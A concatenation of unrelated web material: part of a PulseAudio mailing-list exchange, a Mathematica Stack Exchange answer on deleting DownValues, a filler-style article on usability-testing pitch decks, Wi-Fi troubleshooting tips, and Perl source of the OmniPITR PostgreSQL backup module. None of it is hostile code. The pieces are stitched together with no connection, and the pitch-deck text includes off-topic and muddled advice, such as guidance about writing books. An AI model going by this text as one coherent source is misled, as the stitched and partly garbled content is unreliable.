Express (3x^2 - 3x - 2)/(x-1)(x-2) in partial fractions
How to find the stationary point of y= x^2-108x^(1/2)+16 and determine the nature of the stationary point?
Using Discriminants to Find the Number of Roots of a Quadratic Curve
View A Level Maths tutors
We use cookies to improve your site experience. By continuing to use this website, we'll assume that you're OK with this. Dismiss
mtw:mercury1:status:ok
|
__label__pos
| 0.679919 |
Tutorial Install Centralize Log Manajemen Server Menggunakan Elasticsearch, Logstash dan Kibana di CentOS 7
Rahman Arif 6 November 2017
Tutorial Install Centralize Log Manajemen Server Menggunakan Elasticsearch, Logstash dan Kibana di CentOS 7
Elasticsearch adalah mesin pencari open source dibawah Apache Licence dan ditulis menggunakan bahasa pemrograman Java. Elasticsearch menyediakan mesin pencari teks terdistribusi dan multitenant dengan antarmuka web Dasbor HTTP (Kibana). Data ditampilkan, diambil dan disimpan dengan format JSON. Elasticsearch adalah mesin pencari terukur yang dapat digunakan untuk mencari semua jenis dokumen teks, termasuk file log. Elasticsearch adalah jantung dari 'Elastic Stack' atau ELK Stack.
Logstash adalah tool open source untuk mengelola aktivitas dan log. Logstash menyediakan pipelining real-time untuk pengumpulan data. Dalam tutorial ini, Logstash akan mengumpulkan data log Server, mengubah data menjadi dokumen JSON, dan menyimpannya di Elasticsearch.
Kibana adalah alat visualisasi data open source untuk Elasticsearch. Kibana menyediakan antarmuka web dasbor yang cantik. Kibana dapat kita gunakan untuk mengelola dan memvisualisasikan data dari Elasticsearch. Kibana juga tidak hanya indah, tapi juga bertenaga.
Dalam tutorial ini, kita akan menginstal dan mengkonfigurasi Elastic Stack di server CentOS 7 untuk memantau log server. Kemudian kita akan memasang 'Filebeat' pada sistem operasi klien CentOS 7 dan Ubuntu 16.
Memanfaatkan Geo Query dan Date Query di Elasticsearch
Dalam tutorial kali ini, kita akan melakukan beberapa langkah, diantaranya:
Langkah 1 - Konfigurasi pada Server ELK
Langkah 2 - Install Java
Langkah 3 - Install dan Konfigurasi Elasticsearch
Langkah 4 - Install dan Konfigurasi Kibana di Nginx
Langkah 5 - Install dan Konfigurasi Logstash
Langkah 6 - Install dan Konfigurasi Filebeat pada Klien CentOS
Langkah 7 - Install dan Konfigurasi Filebeat pada Klien Ubuntu
Langkah 8 - Pengujian
Referensi
Persiapan
1. CentOS 7 64 bit dengan RAM 4GB - server.logging.com (192.168.1.97)
2. CentOS 7 64 bit dengan RAM 1 GB - centos7.logging.com (192.168.1.98)
3. Ubuntu 16 64 bit dengan RAM 1 GB - ubuntu1604.logging.com (192.168.1.99)
Langkah 1 - Konfigurasi pada Server ELK
Dalam tutorial ini, kita akan menonaktifkan SELinux di CentOS 7. Dengan mengedit file konfigurasi SELinux. Login ke server dengan akun root, kemudian di ketikan.
$ vim /etc/sysconfig/selinux
Ganti value SELINUX dari enforcing ke disabled.
SELINUX=disabled
Simpan dan tutup Vim.
<tekan tombol esc di keyboard>
:wq
Lalu restart server.
$ reboot
Login ke server dan cek status SELinux dengan mengetikkan.
$ getenforce
Pastikan hasilnya adalah disabled.
Matikan juga Firewall karena dalam tutorial ini, kita tidak memerlukannya.
$ systemctl stop firewalld
$ systemctl disable firewalld
Step 2 - Install Java
Java diperlukan untuk mengistall Elastik stack. Elasticsearch memerlukan Java 8, dianjurkan untuk menggunakan Oracle JDK 1.8. Kita akan menginstal Java 8 dari paket rpm Oracle resmi.
Unduh Java 8 JDK dengan perintah wget.
$ wget --no-cookies --no-check-certificate --header "Cookie: gpw_e24=http:%2F%2Fwww.oracle.com%2F; oraclelicense=accept-securebackup-cookie" "http://download.oracle.com/otn-pub/java/jdk/8u144-b01/090f390dda5b47b9b721c7dfaa008135/jdk-8u144-linux-x64.rpm"
Lalu install dengan perintah rpm.
$ rpm -ivh jdk-8u144-linux-x64.rpm
Selanjutnya, cek versi java JDK untuk memastikan instalasi berjalan semestinya.
$ java -version
Kalian akan melihat versi Java di terminal server.
Step 3 - Install dan Konfigurasi Elasticsearch
Pada langkah ini, kita akan menginstal dan mengkonfigurasi Elasticsearch. Kita akan menginstal Elasticsearch dari paket rpm yang disediakan oleh elastic.co dan mengkonfigurasinya untuk berjalan di localhost (untuk membuat konfigurasi aman dan memastikannya tidak terjangkau dari luar).
Sebelum menginstal Elasticsearch, tambahkan elastic.co key ke server.
$ rpm --import https://artifacts.elastic.co/GPG-KEY-elasticsearch
Selanjutnya, unduh Elasticsearch 5.1 dengan wget lalu instal.
$ wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-5.1.1.rpm
$ rpm -ivh elasticsearch-5.1.1.rpm
Setelah Elasticsearch terinstall. Sekarang masuklah ke direktori konfigurasi dan edit file konfigurasi elasticsaerch.yml.
$ cd /etc/elasticsearch/
$ vim elasticsearch.yml
Aktifkan memory lock dengan menghapus komentar pada baris 40. Ini menonaktifkan memory swapping untuk Elasticsearch.
bootstrap.memory_lock: true`
Di blok Network, hapus tanda komentar pada garis network.host dan http.port.
network.host: localhost
http.port: 9200
Simpan file dan keluar dari editor.
Sekarang edit file elasticsearch.service untuk konfigurasi memory lock.
vim /usr/lib/systemd/system/elasticsearch.service
Hapus tanda komentar pada baris LimitMEMLOCK.
LimitMEMLOCK=infinity
Simpan file dan keluar dari editor.
Edit file konfigurasi sysconfig untuk Elasticsearch.
vim /etc/sysconfig/elasticsearch
Hapus tanda komentar pada baris 60 dan pastikan valuenya adalah unlimited.
MAX_LOCKED_MEMORY=unlimited
Simpan file dan keluar dari editor.
Konfigurasi Elasticsearch telah selesai. Elasticsearch akan berjalan di alamat IP localhost pada port 9200, kita dapat menonaktifkan memory swapping dengan mengaktifkan mlockall di server CentOS.
Reload systemd, aktifkan Elasticsearch untuk memulai saat boot, lalu start service.
sudo systemctl daemon-reload
sudo systemctl enable elasticsearch
sudo systemctl start elasticsearch
Tunggu sebentar agar Elasticsearch dimulai, lalu periksa port yang terbuka di server, pastikan 'state' untuk port 9200 adalah LISTEN.
Cek dengan mengetikkan perintah netstat -plntu
Image
Kemudian periksa *memory lock *untuk memastikan mlockall diaktifkan, dan periksa apakah Elasticsearch berjalan dengan perintah di bawah ini.
curl -XGET 'localhost:9200/_nodes?filter_path=**.mlockall&pretty'
curl -XGET 'localhost:9200/?pretty'
Anda akan melihat hasilnya di bawah ini.
Image
Step 4 - Install dan Konfigurasi Kibana di Nginx
Pada langkah ini, kita akan menginstall dan mengkonfigurasi Kibana dengan server web Nginx. Kibana akan menggunakan alamat IP localhost dan Nginx bertindak sebagai reverse proxy untuk aplikasi Kibana.
Unduh Kibana 5.1 dengan wget, lalu install dengan perintah rpm:
wget https://artifacts.elastic.co/downloads/kibana/kibana-5.1.1-x86_64.rpm
rpm -ivh kibana-5.1.1-x86_64.rpm
Sekarang edit file konfigurasi Kibana.
vim /etc/kibana/kibana.yml
Hapus tanda komentar pada baris konfigurasi untuk server.port, server.host dan elasticsearch.url.
server.port: 5601
server.host: "localhost"
elasticsearch.url: "http://localhost:9200"
Simpan file dan keluar dari editor.
Tambahkan Kibana untuk berjalan saat boot dan start service.
sudo systemctl enable kibana
sudo systemctl start kibana
Kibana akan berjalan di port 5601 sebagai node application.
netstat -plntu
Image
Instalasi Kibana selesai. Sekarang kita perlu menginstal Nginx dan mengkonfigurasinya sebagai reverse proxy untuk bisa mengakses Kibana dari alamat IP publik.
Nginx tersedia di repositori Epel, instal epel-release dengan yum.
yum -y install epel-release
Selanjutnya, pasang paket Nginx dan httpd-tools.
yum -y install nginx httpd-tools
Paket httpd-tools berisi tool untuk server web, kita akan menggunakan otentikasi dasar htpasswd untuk Kibana.
Edit file konfigurasi Nginx dan hapus atau beri tag komentar blok 'server {}', jadi kita bisa menambahkan konfigurasi virtual host baru.
cd /etc/nginx/
vim nginx.conf
Beri tag komentar untuk server {} blok. Simpan file dan keluar dari editor.
Sekarang kita perlu membuat file konfigurasi virtual host baru di direktori conf.d. Buat file baru 'kibana.conf' dengan vim atau vi atau nano.
vim /etc/nginx/conf.d/kibana.conf
Paste konfigurasi di bawah ini.
server {
listen 80;
server_name 192.168.1.97;
auth_basic "Restricted Access";
auth_basic_user_file /etc/nginx/.kibana-user;
location / {
proxy_pass http://localhost:5601;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection 'upgrade';
proxy_set_header Host $host;
proxy_cache_bypass $http_upgrade;
}
}
Simpan file dan keluar dari editor.
Kemudian buat file basic authentication baru dengan perintah htpasswd.
sudo htpasswd -c /etc/nginx/.kibana-user admin
KETIKAN PASSWORD ANDA
Test konfigurasi Nginx dan pastikan tidak ada error. Kemudian tambahkan Nginx untuk dijalankan pada saat boot dan start Nginx.
nginx -t
systemctl enable nginx
systemctl start nginx
NGINX akan berjalan di port 80 sebagai nginx: master.
netstat -plntu
Image
Langkah 5 - Instal dan Konfigurasi Logstash
Pada langkah ini, kita akan menginstal Logstash dan mengkonfigurasinya ke log server terpusat dari klien dengan filebeat, kemudian mem-filter dan mengubah data Syslog dan memindahkannya ke dalam simpanan (Elasticsearch).
Unduh Logstash dan instal dengan rpm.
wget https://artifacts.elastic.co/downloads/logstash/logstash-5.1.1.rpm
rpm -ivh logstash-5.1.1.rpm
Buat file sertifikat SSL baru sehingga klien dapat mengidentifikasi elastic server. Buka direktori tls dan edit file openssl.cnf.
cd /etc/pki/tls
vim openssl.cnf
Tambahkan baris baru di bagian '[v3_ca]' untuk identifikasi server.
[ v3_ca ]
# Server IP Address
subjectAltName = IP: 192.168.1.97
Simpan file dan keluar dari editor.
Buat file sertifikat dengan perintah openssl.
openssl req -config /etc/pki/tls/openssl.cnf -x509 -days 3650 -batch -nodes -newkey rsa:2048 -keyout /etc/pki/tls/private/logstash-forwarder.key -out /etc/pki/tls/certs/logstash-forwarder.crt
File sertifikat dapat ditemukan di direktori /etc/pki/tls/certs/ dan /etc/pki/tls/private/. Selanjutnya, kita akan membuat file konfigurasi baru untuk Logstash. Kita akan membuat file filebeat-input.conf baru untuk mengkonfigurasi sumber log untuk filebeat, lalu file syslog-filter.conf untuk pemrosesan syslog dan file output-elasticsearch.conf untuk menentukan hasil Elasticsearch.
Buka direktori konfigurasi logstash dan buat file konfigurasi baru di subdirektori conf.d.
cd /etc/logstash/
vim conf.d/filebeat-input.conf
Masukan konfigurasi: paste konfigurasi di bawah ini.
input {
beats {
port => 5443
ssl => true
ssl_certificate => "/etc/pki/tls/certs/logstash-forwarder.crt"
ssl_key => "/etc/pki/tls/private/logstash-forwarder.key"
}
}
Simpan file dan keluar dari editor.
Buat file syslog-filter.conf.
vim conf.d/syslog-filter.conf
Paste konfigurasi di bawah ini.
filter {
if [type] == "syslog" {
grok {
match => { "message" => "%{SYSLOGTIMESTAMP:syslog_timestamp} %{SYSLOGHOST:syslog_hostname} %{DATA:syslog_program}(?:\[%{POSINT:syslog_pid}\])?: %{GREEDYDATA:syslog_message}" }
add_field => [ "received_at", "%{@timestamp}" ]
add_field => [ "received_from", "%{host}" ]
}
date {
match => [ "syslog_timestamp", "MMM d HH:mm:ss", "MMM dd HH:mm:ss" ]
}
}
}
KIta menggunakan filter plugin bernama 'grok' untuk mengurai file syslog. Simpan file dan keluar dari editor.
Buat file konfigurasi output output-elasticsearch.conf.
vim conf.d/output-elasticsearch.conf
Paste konfigurasi di bawah ini.
output {
elasticsearch { hosts => ["localhost:9200"]
hosts => "localhost:9200"
manage_template => false
index => "%{[@metadata][beat]}-%{+YYYY.MM.dd}"
document_type => "%{[@metadata][type]}"
}
}
Simpan file dan keluar dari editor.
Selanjutnya tambahkan logstash untuk memulai saat boot dan start service.
sudo systemctl enable logstash
sudo systemctl start logstash
NGINX akan berjalan di port :: 5443
netstat -plntu
Image
Salin logstash-forwarder.crt dari /etc/pki/tls/certs/logstash-forwarder.crt ke /root/logstash-forwarder.crt
cp -v /etc/pki/tls/certs/logstash-forwarder.crt /root/logstash-forwarder.crt
Langkah 6 - Instal dan Konfigurasi Filebeat pada CentOS Client
Beats adalah pengirim data, agen ringan yang dapat diinstal pada node klien untuk mengirim sejumlah besar data dari mesin klien ke server Logstash atau Elasticsearch. Ada 4 ketukan yang tersedia, 'Filebeat' untuk 'Log Files', 'Metricbeat' untuk 'Metrics', 'Packetbeat' untuk 'Network Data' dan 'Winlogbeat' untuk Windows Client 'Event Log'.
Kita akan menginstal dan mengkonfigurasi 'Filebeat' untuk mentransfer file log data ke server Logstash melalui koneksi SSL.
Khusus untuk centos7, kita harus mengizinkan beberapa port jika kita menggunakan layanan firewalld, namun dalam kasus ini, kita akan mematikan firewall dan SELINUX Service, dengan perintah,
systemctl stop firewalld
systemctl disable firewalld
Nonaktifkan SELinux
vim /etc/sysconfig/selinux
Ubah nilai SELINUX dari enforcing ke disabled.
SELINUX = disabled
Kemudian reboot server.
reboot
Login ke server lagi dan periksa status SELinux.
getenforce
Pastikan hasilnya disabled.
Login ke client1 server. Kemudian salin file sertifikat dari elastic server ke server client1.
ssh root@client1IP
Salin file sertifikat dengan perintah scp.
scp [email protected]:~/logstash-forwarder.crt .
KETIKAN server.logging.com root password
Buat direktori baru dan pindahkan file sertifikat ke direktori.
sudo mkdir -p /etc/pki/tls/certs/
mv ~/logstash-forwarder.crt /etc/pki/tls/certs/
Selanjutnya, impor* elastic key* pada client1 server.
rpm --import https://artifacts.elastic.co/GPG-KEY-elasticsearch
Unduh Filebeat dan install dengan rpm.
wget https://artifacts.elastic.co/downloads/beats/filebeat/filebeat-5.1.1-x86_64.rpm
rpm -ivh filebeat-5.1.1-x86_64.rpm
Filebeat telah terinstall, masuk ke direktori konfigurasi dan edit file filebeat.yml.
cd /etc/filebeat/
vim filebeat.yml
Di bagian baris ke 21, tambahkan file log baru. Kita akan menambahkan dua file /var/log/secure untuk aktivitas ssh dan /var/log/messages untuk log server.
paths:
- /var/log/secure
- /var/log/messages
Tambahkan konfigurasi baru pada baris 26 untuk menentukan jenis file syslog.
document-type: syslog
Filebeat menggunakan Elasticsearch sebagai target output secara default. Dalam tutorial ini, kita akan mengubahnya menjadi Logstash. Nonaktifkan keluaran Elasticsearch dengan menambahkan komentar pada baris 83 dan 85. Nonaktifkan output elasticsearch.
#-------------------------- Elasticsearch output ------------------------------
#output.elasticsearch:
# Array of hosts to connect to.
# hosts: ["localhost:9200"]
Sekarang tambahkan konfigurasi output logstash baru. Uncomment konfigurasi output logstash dan ubah semua nilai ke konfigurasi yang ditunjukkan di bawah ini.
output.logstash:
# The Logstash hosts
hosts: ["192.168.1.97:5443"]
bulk_max_size: 1024
ssl.certificate_authorities: ["/etc/pki/tls/certs/logstash-forwarder.crt"]
template.name: "filebeat"
template.path: "filebeat.template.json"
template.overwrite: false
Simpan file dan keluar dari editor.
Tambahkan Filebeat untuk memulai saat boot dan* start service.*
sudo systemctl enable filebeat
sudo systemctl start filebeat
Langkah 7 - Instal dan Konfigurasi Filebeat pada Klien Ubuntu
Sambungkan ke server dengan ssh.
ssh root@ubuntu-clientIP
Salin file sertifikat ke klien dengan perintah scp.
scp [email protected]:~/logstash-forwarder.crt .
Buat direktori baru untuk file sertifikat dan pindahkan file ke direktori.
sudo mkdir -p /etc/pki/tls/certs/
mv ~/logstash-forwarder.crt /etc/pki/tls/certs/
Tambahkan elastic key ke server.
wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -
Unduh paket Filebeat .deb dan instal dengan perintah dpkg.
wget https://artifacts.elastic.co/downloads/beats/filebeat/filebeat-5.1.1-amd64.deb
dpkg -i filebeat-5.1.1-amd64.deb
Arahkan ke direktori konfigurasi filebeat dan ubah file filebeat.yml dengan vim.
cd /etc/filebeat/
vim filebeat.yml
Tambahkan path file log baru di bagian konfigurasi paths.
paths:
- /var/log/auth.log
- /var/log/syslog
Tambahkan konfigurasi ini untuk *document type syslog *pada baris 26.
document-type: syslog
Nonaktifkan hasil elasticsearch dengan menambahkan komentar ke baris yang ditunjukkan di bawah ini.
#-------------------------- Elasticsearch output ------------------------------
#output.elasticsearch:
# Array of hosts to connect to.
# hosts: ["localhost:9200"]
Aktifkan* logstash output,* hapus tanda komentar di konfigurasi dan ubah nilainya seperti gambar di bawah ini.
output.logstash:
# The Logstash hosts
hosts: ["192.168.1.97:5443"]
bulk_max_size: 1024
ssl.certificate_authorities: ["/etc/pki/tls/certs/logstash-forwarder.crt"]
template.name: "filebeat"
template.path: "filebeat.template.json"
template.overwrite: false
Simpan file dan keluar dari editor.
Tambahkan Filebeat untuk memulai saat boot dan* start service.*
sudo systemctl enable filebeat
sudo systemctl start filebeat
Cek status filebeat service.
systemctl status filebeat
Image
Langkah 8 - Pengujian
Buka browser web Anda dan kunjungi elastic stack domain yang Anda gunakan dalam konfigurasi Nginx, milik saya adalah server.logging.com atau 192.168.1.97.
Login sebagai admin user dengan password anda dan tekan Enter untuk login ke dashboard Kibana.
Image
Buat indeks default baru filebeat- *dan klik pada tombol Create.
Image
Indeks default telah dibuat. Jika Anda memiliki beberapa ketukan pada tumpukan elastis, Anda dapat mengonfigurasikan beat default hanya dengan satu klik pada tombol star.
Image
Buka menu 'Discover' dan Anda akan melihat semua file log dari server elk-client1 dan elk-client2.
Image
Contoh output JSON dari log server elk-client1 untuk server yang melakukan reboot.
Image
Dan masih banyak lagi yang bisa Kita lakukan dengan dasbor Kibana.
ELK Stack telah terpasang di server CentOS 7. Filebeat telah diinstal pada CentOS 7 dan klien Ubuntu.
Referensi https://www.elastic.co/guide/index.html
Gambar Sampul: Youtube
|
__label__pos
| 0.628343 |
Array of boxes using Makie and volume
Hi,
the examples from the Makie documentation show how to build a cube (using volume), but if I try to update the scene with a new one, they overlap. Any ideas on how to solve this. I want to create an array of cubes.
using Makie
r = LinRange(-4, 4, 100); # our value range, cube centered at 0
r1 = LinRange(5, 8, 100); # our value range, cube centered at 6
ρ(x, y, z) = exp(-(abs(0.1*x^2))) # function (charge density)
scene = Scene(backgroundcolor = :black)
volume!(
scene,
r, r, r, # coordinates to plot on
ρ, # charge density (functions as colorant)
algorithm = :mip # maximum-intensity-projection
)
volume!(
scene,
r1, r1, r1, # coordinates to plot on
ρ, # charge density (functions as colorant)
algorithm = :mip # maximum-intensity-projection
)
scene[Axis].names.textcolor = :white # let axis labels be seen on dark background
scene
Not Makie, but good for now.
using PlotlyJS
function cube_form(center = 0.0)
mesh3d(
x=[0, 0, 1, 1, 0, 0, 1, 1],
y=[0, 1, 1, 0, 0, 1, 1, 0] .+ center,
z=[0, 0, 0, 0, 1, 1, 1, 1],
i=[7, 0, 0, 0, 4, 4, 6, 6, 4, 0, 3, 2],
j=[3, 4, 1, 2, 5, 6, 5, 2, 0, 1, 6, 3],
k=[0, 7, 2, 3, 6, 7, 1, 1, 5, 5, 7, 6],
intensity=range(0, stop=1, length=8),
colorscale=[
[0, "gold"],
[0.5, "mediumturquoise"],
[1, "gold"]
],
showscale=false,
opacity = 0.5
)
end
t = cube_form()
t1 = cube_form(1.5)
t2 = cube_form(3.0)
plot([t, t1, t2])
1 Like
In Makie you can do:
image
using Makie
function cube_form(center = 0.0)
# In theory mesh(cube) just works, but somehow doesn't play nicely with
# the colormap
cube = FRect3D(Vec3f0(0) .+ Vec3f0(0, center, 0), Vec3f0(1))
points = decompose(Point3f0, cube)
faces = decompose(GLTriangle, cube)
mesh!(
points, faces,
color = LinRange(0, 1, 8),
colormap = [
(:gold, 0.5),
(:mediumturquoise, 0.5),
(:gold, 0.5)
],
transparency = true
)
end
s = Scene()
t = cube_form()
t1 = cube_form(1.5)
t2 = cube_form(3.0)
s
1 Like
I got the following error in julia 1.0.3 ?
UndefVarError: GLTriangle not defined
Stacktrace:
[1] cube_form(::Float64) at ./In[1]:8
[2] cube_form() at ./In[1]:6
[3] top-level scope at In[1]:21
Sorry, needs a using GeometryTypes
Now it works.
How did you change the angle of projection (view angle)? My output doesn’t look like yours.
Edit: Oh, the output in a jupyter notebook is fixed. But running just the script pops out a window where rotation is posible.
You can have the same effect inside a notebook with:
AbstractPlotting.inline!(false)
AbstractPlotting.inline!(false)
Not working in my end. And no error is shown. Dead end here :smile:
|
__label__pos
| 0.996219 |
Manual:thumb.php
From MediaWiki.org
Jump to: navigation, search
Other languages:
català • Deutsch • Ελληνικά • English • español • suomi • français • italiano • 日本語 • Bahasa Melayu • Nederlands • polski • português • português do Brasil • 中文
§Details[edit | edit source]
Script used to resize images if it is configured to be done when the web browser requests the image and not when generating the page.
To use it, set $wgThumbnailScriptPath to the path of this file.
Parameters are f for file name, w for width, p for page in multipaged files (if available).
Example: https://commons.wikimedia.org/w/thumb.php?f=Delle_strade_ferrate_e_della_loro_futura_influenza_in_Europa.djvu&w=600&p=206
§404 Handler[edit | edit source]
This script can also be used as a 404 handler to generate image thumbs when they don't exist. To use it, follow the steps below, then set $wgGenerateThumbnailOnParse to false. If you have $wgLocalFileRepo defined in LocalSettings.php, then you need to also set:
$wgLocalFileRepo['transformVia404'] = true;
§MediaWiki >= 1.20[edit | edit source]
Create a rewrite rule to call thumb_handler.php when a file in $wgUploadPath/thumb/ doesn't exist. If your wiki is in the /w directory, something like this should work on apache:
RewriteEngine on
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^/?w/images/thumb/[0-9a-f]/[0-9a-f][0-9a-f]/[^/]+/[^/]+$ /w/thumb_handler.php [L,QSA]
# If your $wgHashedUploadDirectory is false, remove the first two steps after thumb/
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^/?w/images/thumb/archive/[0-9a-f]/[0-9a-f][0-9a-f]/[^/]+/[^/]+$ /w/thumb_handler.php [L,QSA]
If this doesn't work, the 1.19 version should still work.
§MediaWiki <= 1.19[edit | edit source]
Create a rewrite rule to call this script when a file in $wgUploadPath/thumb/ doesn't exist. If your wiki is in the /wiki directory, something like this should work on apache:
RewriteEngine on
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^/?w/images/thumb/[0-9a-f]/[0-9a-f][0-9a-f]/([^/]+)/([0-9]+)px-.*$ /w/thumb.php?f=$1&width=$2 [L,QSA,B]
# If your $wgHashedUploadDirectory is false, remove the first two steps after thumb/
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^/?w/images/thumb/archive/[0-9a-f]/[0-9a-f][0-9a-f]/([^/]+)/([0-9]+)px-.*$ /w/thumb.php?f=$1&width=$2&archived=1 [L,QSA,B]
# If your $wgHashedUploadDirectory is false, remove the first two steps after thumb/archive/
Example: http://www.mediawiki.org/w/thumb.php?f=example.jpg&width=100
§Scripted transform[edit | edit source]
Just add the following code to the bottom of LocalSettings.php.
$wgThumbnailScriptPath = "{$wgScriptPath}/thumb{$wgScriptExtension}";
No apache config changes needed. This will cause thumb.php to either return the file if its already been rendered, or render the file on demand if needed.
§See also[edit | edit source]
|
__label__pos
| 0.587203 |
Skip to content
Related Articles
Related Articles
Improve Article
Save Article
Like Article
Smallest subarray from a given Array with sum greater than or equal to K
• Difficulty Level : Hard
• Last Updated : 28 Jul, 2020
Given an array A[] consisting of N integers and an integer K, the task is to find the length of the smallest subarray with sum greater than or equal to K. If no such subarray exists, print -1.
Examples:
Input: A[] = {2, -1, 2}, K = 3
Output: 3
Explanation:
Sum of the given array is 3.
Hence, the smallest possible subarray satisfying the required condition is the entire array.
Therefore, the length is 3.
Input: A[] = {2, 1, 1, -4, 3, 1, -1, 2}, K = 5
Output: 4
Naive Approach:
The simplest approach to solve the problem is to generate all possible subarrays of the given array and check which subarray sum is greater than or equal to K. Among all such subarrays satisfying the condition, print the subarray having minimum length.
Time Complexity:O(N2)
Auxiliary Space: O(1)
Efficient Approach:
The above approach can be further optimized using Prefix Sum Array and Binary search. Follow the steps below:
• Initialize an array to store the Prefix sum of the original array.
• Hash the prefix sum array with the indices using a Map.
• If a greater sum with a lesser index is already found, then there is no point of hashing a prefix sum which is smaller than the largest prefix sum obtained till now. Therefore, hash the increasing order of prefix sum.
• Traversing the array and if any element is greater than or equal to K, return 1 as the answer.
• Otherwise, for every element, perform Binary Search over the indices (i, n-1) in the prefix sum array to find the first index with sum at least K.
• Return the minimum length subarray obtained from the above steps.
Below is the implementation of the above approach:
C++
// C++ Program to implement
// the above approach
#include <bits/stdc++.h>
using namespace std;
// Function to perform Binary Search
// and return the smallest index with
// sum greater than value
int binary_search(map<int, vector<int> >& m,
int value, int index)
{
// Search the value in map
auto it = m.lower_bound(value);
// If all keys in the map
// are less then value
if (it == m.end())
return 0;
// Check if the sum is found
// at a greater index
auto it1
= lower_bound(it->second.begin(),
it->second.end(), index);
if ((it1 - it->second.begin())
!= it->second.size())
return *it1;
return 0;
}
// Function to find the smallest subarray
// with sum greater than equal to K
int findSubarray(int arr[], int n, int k)
{
// Prefix sum array
int pre_array[n];
// Stores the hashes to prefix sum
map<int, vector<int> > m;
pre_array[0] = arr[0];
m[pre_array[0]].push_back(0);
// If any array element is
// greater than equal to k
if (arr[0] >= k)
return 1;
int ans = INT_MAX;
for (int i = 1; i < n; i++) {
pre_array[i]
= arr[i] + pre_array[i - 1];
// If prefix sum exceeds K
if (pre_array[i] >= k)
// Update size of subarray
ans = min(ans, i + 1);
auto it = m.rbegin();
// Hash prefix sum in
// increasing order
if (pre_array[i] >= it->first)
m[pre_array[i]].push_back(i);
}
for (int i = 1; i < n; i++) {
int temp
= binary_search(m,
pre_array[i - 1] + k,
i);
if (temp == 0)
continue;
// Update size of subarray
ans = min(ans, temp - i + 1);
}
// If any subarray is found
if (ans <= n)
return ans;
// If no such subarray exists
return -1;
}
// Driver Code
int main()
{
int arr[] = { 2, 1, 1, -4, 3, 1, -1, 2 };
int k = 5;
int n = sizeof(arr) / sizeof(arr[0]);
cout << findSubarray(arr, n, k) << endl;
return 0;
}
Output:
4
Time Complexity: O(NlogN)
Auxiliary Space: O(N)
My Personal Notes arrow_drop_up
Recommended Articles
Page :
Start Your Coding Journey Now!
|
__label__pos
| 0.994751 |
[ < ] [ > ] [ << ] [ Up ] [ >> ] [Top] [Contents] [Index] [ ? ]
1. Введение
Automake --- это утилита для автоматического создания файлов `Makefile.in' из файлов `Makefile.am'. Каждый файл `Makefile.am' фактически является набором макросов для программы make (иногда с несколькими правилами). Полученные таким образом файлы `Makefile.in' соответствуют стандартам GNU Makefile.
Стандарт GNU Makefile (see section `Makefile Conventions' in The GNU Coding Standards) --- это длинный, запутанный документ, и его содержание может в будущем измениться. Automake разработан для того, чтобы убрать бремя сопровождения Makefile с плеч человека, ведущего проект GNU (и взвалить его на человека, сопровождающего Automake).
Типичный входной файл Automake является просто набором макроопределений. Каждый такой файл обрабатывается, и из него создается файл `Makefile.in'. В каталоге проекта должен быть только один файл `Makefile.am'.
Automake накладывает на проект некоторые ограничения; например, он предполагает, что проект использует программу Autoconf (see section `Введение' in Руководство Autoconf), а также налагает некоторые ограничения на содержимое файла `configure.in'.
Automake требует наличия программы perl для генерации файлов `Makefile.in'. Однако дистрибутив, созданный Automake, является полностью соответствующим стандартам GNU и не требует наличия perl для компиляции.
Вы можете посылать пожелания по доработке и сообщения об ошибках Automake по адресу [email protected].
[ << ] [ >> ] [Top] [Contents] [Index] [ ? ]
This document was generated on February, 19 2004 using texi2html
|
__label__pos
| 0.603252 |
View Problem
Find all Pythagorean triangles with length or height less than or equal to 20
Pythagorean triangles are right angle triangles whose sides comply with the following equation:
a * a + b * b = c * c
where c represents the length of the hypotenuse, and a and b represent the lengths of the other two sides. Find all such triangles where a, b and c are non-zero integers with a and b less than or equal to 20. Sort your results by the size of the hypotenuse. The expected answer is:
[3, 4, 5]
[6, 8, 10]
[5, 12, 13]
[9, 12, 15]
[8, 15, 17]
[12, 16, 20]
[15, 20, 25]
DiskEdit
ruby
results=[]
1.upto(20) do |a|
1.upto(20) do |b|
c=Math.sqrt(a**2+b**2)
results<<[a, b, c.to_i] if c.to_i==c && !results.index([b, a, c.to_i])
end
end
results=results.sort_by{|r| r[2]}
puts results
ExpandDiskEdit
ruby
def find_pythag( max=20 )
r = []
1.upto max do |n|
n.upto max do |m|
h = Math.sqrt( n**2 + m**2)
r << [n,m,h.to_i] if (h.round - h).zero?
end
end
r.sort_by { |a| a[2] }
end
DiskEdit
erlang
find_all_pythagorean_triangles(L) ->
lists:sort(fun({_, _, H1}, {_, _, H2}) -> H1 =< H2 end,
[ { X, Y, Z } ||
X <- lists:seq(1,L),
Y <- lists:seq(1,L),
Z <- lists:seq(1,2*L),
X*X + Y*Y =:= Z*Z,
Y > X,
Z > Y
]).
main(_) ->
List = find_all_pythagorean_triangles(20).
Submit a new solution for ruby, csharp, or erlang
There are 17 other solutions in additional languages (clojure, cpp, fantom, fsharp ...)
|
__label__pos
| 0.999851 |
[pulseaudio-discuss] Detecting when data source disappears?
Georg Chini georg at chini.tk
Fri May 19 06:05:08 UTC 2017
On 19.05.2017 06:02, Steven Wawryk wrote:
>
>
>>> I've been reading up and experimenting on both the simple and async
>>> APIs. In one experiment, I used a CLI file that sets up a set of
>>> module-sine modules with output remapped by module-remap-sink modules
>>> to a stream fed to a module-null-sink module.
Could you please include the command sequence you are using? Maybe I can
reproduce the problem here.
>>>
>>> I then wrote 2 programs, one using the simple API and the other the
>>> async API to read date from the module-null-sink monitor source and
>>> write the data to file (both based on examples to provide "parec"
>>> functionality). Then I could unload either all the module-sine
>>> modules or all the module-remap-sink modules to interrupt the data
>>> source to the module-null-sink module.
>>>
>>> Both programs gave the same result, which I don't completely
>>> understand.
>>>
>>> The issues I've found are:
>>>
>>> 1. After the data source is gone, the program continues to write data
>>> to file. There doesn't seem to be any way to detect a stream of
>>> "zero" data using the APIs.
>> That is expected behavior. null-sink.monitor is not different from other
>> sources, which means
>> if there is no input to the null-sink, it will generate silence. It's
